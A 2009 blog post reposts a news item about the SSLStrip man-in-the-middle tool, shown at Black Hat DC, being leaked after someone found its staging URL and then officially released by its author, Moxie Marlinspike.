Tuesday, February 24, 2009

SSLStrip Hacking Tool Gets 'Hacked,' Then Released

Via DarkReading -

In a bizarre twist, a hacker hacked into another hacker's Web server and forced the release of a hacking tool that was first demonstrated last week at Black Hat DC. The so-called SSLStrip tool, which basically makes users think they are visiting a secure Website when they are not, is now available for download.

Moxie Marlinspike, the hacker who created and demonstrated the tool in his Black Hat talk, had planned to eventually release the tool, but went ahead and officially did so late yesterday after an unknown hacker apparently sniffed out the URL Marlinspike was using to develop the tool and blasted it on Slashdot.

"Greetings slashdotters. Apparently the demand for this has been so great that someone went to the trouble of wardialing for the unpublished URL where sslstrip was being staged on my webserver. Then having guessed the correct URL, and not content to merely have access, they also slashdotted it," Marlinspike wrote in a message on his Website.

Marlinspike's tool lets an attacker or researcher stage a man-in-the middle attack against a Secure Sockets Layer (SSL) Web session. Marlinspike says there's no simple fix for defending against the attack because it's not a typical software bug or protocol vulnerability that can be patched. "It's hard to fix," he said in an interview. "This attack comes closer to an implementation bug...it's a problem with the way SSL is deployed."

No comments:

Post a Comment